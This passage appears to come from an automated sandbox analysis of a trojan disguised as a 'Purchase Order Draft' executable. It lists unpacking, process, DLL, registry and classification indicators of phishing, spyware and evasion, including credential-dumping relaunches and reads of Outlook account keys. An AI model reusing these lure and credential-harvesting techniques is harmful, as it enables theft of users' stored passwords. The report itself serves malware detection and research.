              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00446D308_2_00446D30
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00446D8B8_2_00446D8B
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00406E8F8_2_00406E8F
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004050389_2_00405038
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0041208C9_2_0041208C
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004050A99_2_004050A9
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0040511A9_2_0040511A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0043C13A9_2_0043C13A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004051AB9_2_004051AB
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004493009_2_00449300
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0040D3229_2_0040D322
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0044A4F09_2_0044A4F0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0043A5AB9_2_0043A5AB
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004136319_2_00413631
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004466909_2_00446690
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0044A7309_2_0044A730
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004398D89_2_004398D8
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_004498E09_2_004498E0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0044A8869_2_0044A886
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0043DA099_2_0043DA09
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00438D5E9_2_00438D5E
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00449ED09_2_00449ED0
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0041FE839_2_0041FE83
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00430F549_2_00430F54
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004050C210_2_004050C2
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004014AB10_2_004014AB
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_0040513310_2_00405133
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004051A410_2_004051A4
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_0040124610_2_00401246
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_0040CA4610_2_0040CA46
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_0040523510_2_00405235
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004032C810_2_004032C8
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_004222D910_2_004222D9
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_0040168910_2_00401689
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00402F6010_2_00402F60
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: String function: 00402B3A appears 51 times
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000000.00000002.2360042184.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000003.2669888345.00000000076FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000000.2357104183.000000000044A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameadiaphanous.exeh$ vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000003.2647242527.00000000076E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000003.2669752470.00000000076F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2832745888.00000000076F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852972867.000000003828B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: OriginalFileName vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: OriginalFilename vs Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/18@1/3
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,8_2_004182CE
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 10_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,10_2_00410DE1
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_00404635 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404635
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,8_2_00413D4C
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040206A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,8_2_0040B58D
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\json[1].jsonJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile created: C:\Users\user\AppData\Local\Temp\nsu42E8.tmpJump to behavior
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe, 00000005.00000002.2852788457.0000000038180000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile read: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_9-33206
              Source: unknownProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\rhjrpro"
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\cjobhkzbwg"
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\edcuicjcrowul"
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\rhjrpro"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\cjobhkzbwg"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeProcess created: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe "C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe" /stext "C:\Users\user\AppData\Local\Temp\edcuicjcrowul"Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: riched20.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: usp10.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: msls31.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile written: C:\Users\user\AppData\Local\Temp\Settings.iniJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeFile opened: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.cfgJump to behavior
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeUnpacked PE file: 8.2.Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeUnpacked PE file: 9.2.Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeUnpacked PE file: 10.2.Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
              Source: Yara matchFile source: Process Memory Space: Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exe PID: 7000, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2363055993.00000000073C6000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_004062F6 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062F6
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382A2806 push ecx; ret 5_2_382A2819
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 5_2_382B1219 push esp; iretd 5_2_382B121A
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044693D push ecx; ret 8_2_0044694D
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044DB70 push eax; ret 8_2_0044DB84
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_0044DB70 push eax; ret 8_2_0044DBAC
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 8_2_00451D54 push eax; ret 8_2_00451D61
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0044B090 push eax; ret 9_2_0044B0A4
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_0044B090 push eax; ret 9_2_0044B0CC
              Source: C:\Users\user\Desktop\Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeCode function: 9_2_00451D34 push eax; ret 9_2_00451D41
